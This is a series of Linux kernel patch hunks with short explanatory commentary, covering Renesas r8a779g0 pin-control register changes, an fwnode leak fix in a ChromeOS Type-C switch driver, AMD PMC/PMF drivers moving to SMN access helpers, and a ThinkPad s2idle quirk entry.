+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_TD3,		SEL_AVB1_TD3_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_MII_TD3,		SEL_AVB1_TD3_0),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_TD3),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_RD3),
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_MII_RD3),
+@@ -1091,29 +1122,29 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP2SR6_19_16,	AVB1_TXCREFCLK),
+ 
+ 	/* IP0SR7 */
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_AVTP_PPS,		SEL_AVB0_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_MII_COL,		SEL_AVB0_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_AVTP_MATCH,	SEL_AVB0_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_MII_RX_ER,		SEL_AVB0_AVTP_MATCH_0),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	CC5_OSCOUT,		SEL_AVB0_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_MII_RX_ER),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	CC5_OSCOUT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_TD3,		SEL_AVB0_TD3_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_MII_TD3,		SEL_AVB0_TD3_0),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_TD3),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_MII_TX_ER),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_23_20,	AVB0_PHY_INT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_TD2,		SEL_AVB0_TD2_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_MII_TD2,		SEL_AVB0_TD2_0),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_TD2),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_MII_TD2),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_TD1,		SEL_AVB0_TD1_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_MII_TD1,		SEL_AVB0_TD1_0),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_TD1),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_MII_TD1),
+ 
+ 	/* IP1SR7 */
+ 	PINMUX_IPSR_GPSR(IP1SR7_3_0,	AVB0_RD3),
+@@ -1121,24 +1152,24 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_7_4,	AVB0_TXCREFCLK),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_11_8,	AVB0_MAGIC,		SEL_AVB0_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_11_8,	AVB0_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_TD0,		SEL_AVB0_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_MII_TD0,		SEL_AVB0_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_TD0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_RD2),
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_MII_RD2),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_23_20,	AVB0_MDC,		SEL_AVB0_MDC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_23_20,	AVB0_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_27_24,	AVB0_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_TXC,		SEL_AVB0_TXC_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_MII_TXC,		SEL_AVB0_TXC_0),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_MII_TXC),
+ 
+ 	/* IP2SR7 */
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_TX_CTL,		SEL_AVB0_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_MII_TX_EN,		SEL_AVB0_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_MII_TX_EN),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_RD1),
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_MII_RD1),
+@@ -3419,6 +3450,82 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 		IP3SR3_7_4
+ 		IP3SR3_3_0))
+ 	},
++	{ PINMUX_CFG_REG_VAR("IP0SR4", 0xE6060060, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR4_31_28
++		IP0SR4_27_24
++		IP0SR4_23_20
++		IP0SR4_19_16
++		IP0SR4_15_12
++		IP0SR4_11_8
++		IP0SR4_7_4
++		IP0SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR4", 0xE6060064, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR4_31_28
++		IP1SR4_27_24
++		IP1SR4_23_20
++		IP1SR4_19_16
++		IP1SR4_15_12
++		IP1SR4_11_8
++		IP1SR4_7_4
++		IP1SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR4", 0xE6060068, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP2SR4_31_28
++		IP2SR4_27_24
++		IP2SR4_23_20
++		IP2SR4_19_16
++		IP2SR4_15_12
++		IP2SR4_11_8
++		IP2SR4_7_4
++		IP2SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP3SR4", 0xE606006C, 32,
++			     GROUP(-28, 4),
++			     GROUP(
++		/* IP3SR4_31_4 RESERVED */
++		IP3SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP0SR5", 0xE6060860, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR5_31_28
++		IP0SR5_27_24
++		IP0SR5_23_20
++		IP0SR5_19_16
++		IP0SR5_15_12
++		IP0SR5_11_8
++		IP0SR5_7_4
++		IP0SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR5", 0xE6060864, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR5_31_28
++		IP1SR5_27_24
++		IP1SR5_23_20
++		IP1SR5_19_16
++		IP1SR5_15_12
++		IP1SR5_11_8
++		IP1SR5_7_4
++		IP1SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR5", 0xE6060868, 32,
++			     GROUP(-12, 4, 4, 4, 4, 4),
++			     GROUP(
++		/* IP2SR5_31_20 RESERVED */
++		IP2SR5_19_16
++		IP2SR5_15_12
++		IP2SR5_11_8
++		IP2SR5_7_4
++		IP2SR5_3_0))
++	},
+ 	{ PINMUX_CFG_REG("IP0SR6", 0xE6061060, 32, 4, GROUP(
+ 		IP0SR6_31_28
+ 		IP0SR6_27_24
+@@ -3505,95 +3612,6 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 
+ #define F_(x, y)	x,
+ #define FM(x)		FN_##x,
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL4", 0xE6060100, 32,
+-			     GROUP(-12, 1, 1, -2, 1, 1, -1, 1, -2, 1, 1, -2, 1,
+-				   -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL4_19
+-		MOD_SEL4_18
+-		/* RESERVED 17-16 */
+-		MOD_SEL4_15
+-		MOD_SEL4_14
+-		/* RESERVED 13 */
+-		MOD_SEL4_12
+-		/* RESERVED 11-10 */
+-		MOD_SEL4_9
+-		MOD_SEL4_8
+-		/* RESERVED 7-6 */
+-		MOD_SEL4_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL4_2
+-		MOD_SEL4_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL5", 0xE6060900, 32,
+-			     GROUP(-12, 1, -2, 1, 1, -2, 1, 1, -2, 1, -1,
+-				   1, 1, -2, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL5_19
+-		/* RESERVED 18-17 */
+-		MOD_SEL5_16
+-		MOD_SEL5_15
+-		/* RESERVED 14-13 */
+-		MOD_SEL5_12
+-		MOD_SEL5_11
+-		/* RESERVED 10-9 */
+-		MOD_SEL5_8
+-		/* RESERVED 7 */
+-		MOD_SEL5_6
+-		MOD_SEL5_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL5_2
+-		/* RESERVED 1 */
+-		MOD_SEL5_0))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL6", 0xE6061100, 32,
+-			     GROUP(-13, 1, -1, 1, -2, 1, 1,
+-				   -1, 1, -2, 1, 1, 1, -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-19 */
+-		MOD_SEL6_18
+-		/* RESERVED 17 */
+-		MOD_SEL6_16
+-		/* RESERVED 15-14 */
+-		MOD_SEL6_13
+-		MOD_SEL6_12
+-		/* RESERVED 11 */
+-		MOD_SEL6_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL6_7
+-		MOD_SEL6_6
+-		MOD_SEL6_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL6_2
+-		MOD_SEL6_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL7", 0xE6061900, 32,
+-			     GROUP(-15, 1, 1, -1, 1, -1, 1, 1, -2, 1, 1,
+-				   -2, 1, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-17 */
+-		MOD_SEL7_16
+-		MOD_SEL7_15
+-		/* RESERVED 14 */
+-		MOD_SEL7_13
+-		/* RESERVED 12 */
+-		MOD_SEL7_11
+-		MOD_SEL7_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL7_7
+-		MOD_SEL7_6
+-		/* RESERVED 5-4 */
+-		MOD_SEL7_3
+-		MOD_SEL7_2
+-		/* RESERVED 1 */
+-		MOD_SEL7_0))
+-	},
+ 	{ PINMUX_CFG_REG_VAR("MOD_SEL8", 0xE6068100, 32,
+ 			     GROUP(-20, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1),
+ 			     GROUP(
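
The r8a779g0 PFC hunks above drop the MOD_SEL4..MOD_SEL7 register descriptions and demote the affected functions from PINMUX_IPSR_MSEL() to PINMUX_IPSR_GPSR(); on this SoC those module-select bits apparently do not exist, so the functions are selected by the 4-bit IPxSRy field alone. An illustrative contrast of the two macro forms as used in drivers/pinctrl/renesas (my reading of the macros, not text from the patch):

        /* Function selected purely by the IPxSRy bitfield: */
        PINMUX_IPSR_GPSR(IP0SR6_23_20, AVB1_AVTP_MATCH),

        /* Function additionally gated by a MOD_SELx bit -- wrong here,
         * since no real SEL_AVB1_* register bit backs it: */
        PINMUX_IPSR_MSEL(IP0SR6_23_20, AVB1_AVTP_MATCH, SEL_AVB1_AVTP_MATCH_1),

In the new IP*SR4/IP*SR5 entries, the GROUP() encoding follows the usual sh-pfc convention: positive values are field widths in bits, and negative values such as -28 mark reserved spans that consume bits without decoding to any function.
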
+diff --git a/drivers/platform/chrome/cros_typec_switch.c b/drivers/platform/chrome/cros_typec_switch.c
+index a26219e97c931..26af51952f7f1 100644
+--- a/drivers/platform/chrome/cros_typec_switch.c
++++ b/drivers/platform/chrome/cros_typec_switch.c
+@@ -268,6 +268,7 @@ static int cros_typec_register_switches(struct cros_typec_switch_data *sdata)
+ 
+ 	return 0;
+ err_switch:
++	fwnode_handle_put(fwnode);
+ 	cros_typec_unregister_switches(sdata);
+ 	return ret;
+ }
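
The one-line cros_typec_switch fix above plugs an fwnode reference leak: the registration loop walks children with device_for_each_child_node(), which takes a reference on each child it hands to the loop body, and the error path jumped out of the loop without dropping the reference for the node that failed. A minimal sketch of the leak-free pattern (register_one() is a hypothetical helper):

        #include <linux/property.h>

        static int register_children(struct device *dev)
        {
                struct fwnode_handle *fwnode;
                int ret;

                device_for_each_child_node(dev, fwnode) {
                        ret = register_one(dev, fwnode);
                        if (ret) {
                                /* drop the ref the iterator took for this child */
                                fwnode_handle_put(fwnode);
                                return ret;
                        }
                }
                return 0;
        }
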
+diff --git a/drivers/platform/x86/amd/Kconfig b/drivers/platform/x86/amd/Kconfig
+index 2ce8cb2170dfc..d9685aef0887d 100644
+--- a/drivers/platform/x86/amd/Kconfig
++++ b/drivers/platform/x86/amd/Kconfig
+@@ -7,7 +7,7 @@ source "drivers/platform/x86/amd/pmf/Kconfig"
+ 
+ config AMD_PMC
+ 	tristate "AMD SoC PMC driver"
+-	depends on ACPI && PCI && RTC_CLASS
++	depends on ACPI && PCI && RTC_CLASS && AMD_NB
+ 	select SERIO
+ 	help
+ 	  The driver provides support for AMD Power Management Controller
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index be1b49824edbd..eb9fc6cb13e33 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -10,6 +10,7 @@
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <asm/amd_nb.h>
+ #include <linux/acpi.h>
+ #include <linux/bitfield.h>
+ #include <linux/bits.h>
+@@ -37,8 +38,6 @@
+ #define AMD_PMC_SCRATCH_REG_YC		0xD14
+ 
+ /* STB Registers */
+-#define AMD_PMC_STB_INDEX_ADDRESS	0xF8
+-#define AMD_PMC_STB_INDEX_DATA		0xFC
+ #define AMD_PMC_STB_PMI_0		0x03E30600
+ #define AMD_PMC_STB_S2IDLE_PREPARE	0xC6000001
+ #define AMD_PMC_STB_S2IDLE_RESTORE	0xC6000002
+@@ -55,8 +54,6 @@
+ #define S2D_TELEMETRY_DRAMBYTES_MAX	0x1000000
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMC_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMC_SMU_INDEX_DATA		0xBC
+ #define AMD_PMC_MAPPING_SIZE		0x01000
+ #define AMD_PMC_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMC_BASE_ADDR_LO		0x13B102E8
+@@ -310,33 +307,6 @@ static int amd_pmc_setup_smu_logging(struct amd_pmc_dev *dev)
+ 	return 0;
+ }
+ 
+-static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
+-				 struct seq_file *s)
+-{
+-	u32 val;
+-
+-	switch (pdev->cpu_id) {
+-	case AMD_CPU_ID_CZN:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
+-		break;
+-	case AMD_CPU_ID_YC:
+-	case AMD_CPU_ID_CB:
+-	case AMD_CPU_ID_PS:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	if (dev)
+-		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
+-
+-	if (s)
+-		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+-
+-	return 0;
+-}
+-
+ static int get_metrics_table(struct amd_pmc_dev *pdev, struct smu_metrics *table)
+ {
+ 	if (!pdev->smu_virt_addr) {
+@@ -373,6 +343,9 @@ static int amd_pmc_get_smu_version(struct amd_pmc_dev *dev)
+ 	int rc;
+ 	u32 val;
+ 
++	if (dev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
+ 	rc = amd_pmc_send_cmd(dev, 0, &val, SMU_MSG_GETSMUVERSION, 1);
+ 	if (rc)
+ 		return rc;
+@@ -419,12 +392,31 @@ static ssize_t smu_program_show(struct device *d, struct device_attribute *attr,
+ static DEVICE_ATTR_RO(smu_fw_version);
+ static DEVICE_ATTR_RO(smu_program);
+ 
++static umode_t pmc_attr_is_visible(struct kobject *kobj, struct attribute *attr, int idx)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct amd_pmc_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return 0;
++	return 0444;
++}
++
+ static struct attribute *pmc_attrs[] = {
+ 	&dev_attr_smu_fw_version.attr,
+ 	&dev_attr_smu_program.attr,
+ 	NULL,
+ };
+-ATTRIBUTE_GROUPS(pmc);
++
++static struct attribute_group pmc_attr_group = {
++	.attrs = pmc_attrs,
++	.is_visible = pmc_attr_is_visible,
++};
++
++static const struct attribute_group *pmc_groups[] = {
++	&pmc_attr_group,
++	NULL,
++};
+ 
+ static int smu_fw_info_show(struct seq_file *s, void *unused)
+ {
+@@ -491,28 +483,47 @@ static int s0ix_stats_show(struct seq_file *s, void *unused)
+ }
+ DEFINE_SHOW_ATTRIBUTE(s0ix_stats);
+ 
+-static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
++				 struct seq_file *s)
+ {
+-	struct amd_pmc_dev *dev = s->private;
++	u32 val;
+ 	int rc;
+ 
+-	/* we haven't yet read SMU version */
+-	if (!dev->major) {
+-		rc = amd_pmc_get_smu_version(dev);
+-		if (rc)
+-			return rc;
++	switch (pdev->cpu_id) {
++	case AMD_CPU_ID_CZN:
++		/* we haven't yet read SMU version */
++		if (!pdev->major) {
++			rc = amd_pmc_get_smu_version(pdev);
++			if (rc)
++				return rc;
++		}
++		if (pdev->major > 56 || (pdev->major >= 55 && pdev->minor >= 37))
++			val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
++		else
++			return -EINVAL;
++		break;
++	case AMD_CPU_ID_YC:
++	case AMD_CPU_ID_CB:
++	case AMD_CPU_ID_PS:
++		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
++		break;
++	default:
++		return -EINVAL;
+ 	}
+ 
+-	if (dev->major > 56 || (dev->major >= 55 && dev->minor >= 37)) {
+-		rc = amd_pmc_idlemask_read(dev, NULL, s);
+-		if (rc)
+-			return rc;
+-	} else {
+-		seq_puts(s, "Unsupported SMU version for Idlemask\n");
+-	}
++	if (dev)
++		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
++
++	if (s)
++		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+ 
+ 	return 0;
+ }
++
++static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++{
++	return amd_pmc_idlemask_read(s->private, NULL, s);
++}
+ DEFINE_SHOW_ATTRIBUTE(amd_pmc_idlemask);
+ 
+ static void amd_pmc_dbgfs_unregister(struct amd_pmc_dev *dev)
+@@ -783,6 +794,14 @@ static void amd_pmc_s2idle_check(void)
+ 		dev_err(pdev->dev, "error writing to STB: %d\n", rc);
+ }
+ 
++static int amd_pmc_dump_data(struct amd_pmc_dev *pdev)
++{
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
++	return amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++}
++
+ static void amd_pmc_s2idle_restore(void)
+ {
+ 	struct amd_pmc_dev *pdev = &pmc;
+@@ -795,7 +814,7 @@ static void amd_pmc_s2idle_restore(void)
+ 		dev_err(pdev->dev, "resume failed: %d\n", rc);
+ 
+ 	/* Let SMU know that we are looking for stats */
+-	amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++	amd_pmc_dump_data(pdev);
+ 
+ 	rc = amd_pmc_write_stb(pdev, AMD_PMC_STB_S2IDLE_RESTORE);
+ 	if (rc)
+@@ -876,17 +895,9 @@ static int amd_pmc_write_stb(struct amd_pmc_dev *dev, u32 data)
+ {
+ 	int err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
++	err = amd_smn_write(0, AMD_PMC_STB_PMI_0, data);
+ 	if (err) {
+-		dev_err(dev->dev, "failed to write addr in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, data);
+-	if (err) {
+-		dev_err(dev->dev, "failed to write data in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_DATA);
++		dev_err(dev->dev, "failed to write data in stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+@@ -898,18 +909,10 @@ static int amd_pmc_read_stb(struct amd_pmc_dev *dev, u32 *buf)
+ {
+ 	int i, err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
+-	if (err) {
+-		dev_err(dev->dev, "error writing addr to stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+ 	for (i = 0; i < FIFO_SIZE; i++) {
+-		err = pci_read_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, buf++);
++		err = amd_smn_read(0, AMD_PMC_STB_PMI_0, buf++);
+ 		if (err) {
+-			dev_err(dev->dev, "error reading data from stb: 0x%X\n",
+-				AMD_PMC_STB_INDEX_DATA);
++			dev_err(dev->dev, "error reading data from stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 			return pcibios_err_to_errno(err);
+ 		}
+ 	}
+@@ -936,30 +939,18 @@ static int amd_pmc_probe(struct platform_device *pdev)
+ 
+ 	dev->cpu_id = rdev->device;
+ 	dev->rdev = rdev;
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_LO);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMC_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_HI);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
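
The amd/pmc rework above (mirrored for amd/pmf below) replaces open-coded SMN (System Management Network) accesses through the PCI root device's index/data config-space pairs, 0xB8/0xBC for the SMU base address and 0xF8/0xFC for STB, with the amd_smn_read()/amd_smn_write() helpers from asm/amd_nb.h; hence the new AMD_NB Kconfig dependency. The helpers serialize the index/data sequence internally, so two users can no longer interleave writes to the shared register pair. The shape of the conversion:

        #include <asm/amd_nb.h>

        /* Before: two config-space accesses per read, racy against other
         * users of the same index/data pair. */
        pci_write_config_dword(rdev, 0xB8 /* index */, AMD_PMC_BASE_ADDR_LO);
        pci_read_config_dword(rdev, 0xBC /* data */, &val);

        /* After: one serialized helper call against node 0. */
        err = amd_smn_read(0, AMD_PMC_BASE_ADDR_LO, &val);

The same hunks also make the smu_fw_version/smu_program sysfs attributes conditional via an is_visible() hook, returning 0 (hidden) on Picasso (AMD_CPU_ID_PCO), whose SMU does not implement the version query.
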
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index 6d89528c31779..d87986adf91e1 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -7,6 +7,7 @@ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
+ 	depends on POWER_SUPPLY
++	depends on AMD_NB
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index da23639071d79..0acc0b6221290 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -8,6 +8,7 @@
+  * Author: Shyam Sundar S K <Shyam-sundar.S-k@amd.com>
+  */
+ 
++#include <asm/amd_nb.h>
+ #include <linux/debugfs.h>
+ #include <linux/iopoll.h>
+ #include <linux/module.h>
+@@ -22,8 +23,6 @@
+ #define AMD_PMF_REGISTER_ARGUMENT	0xA58
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMF_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMF_SMU_INDEX_DATA		0xBC
+ #define AMD_PMF_MAPPING_SIZE		0x01000
+ #define AMD_PMF_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMF_BASE_ADDR_LO		0x13B102E8
+@@ -348,30 +347,19 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	dev->cpu_id = rdev->device;
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+ 
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_LO);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMF_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_HI);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 2a48a2d880d86..d1ec31086e9ba 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -4481,6 +4481,14 @@ static const struct dmi_system_id fwbug_list[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "20UH"),
+ 		}
+ 	},
++	{
++		.ident = "T14s Gen1 AMD",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "20UJ"),
++		}
++	},
+ 	{
+ 		.ident = "P14s Gen1 AMD",
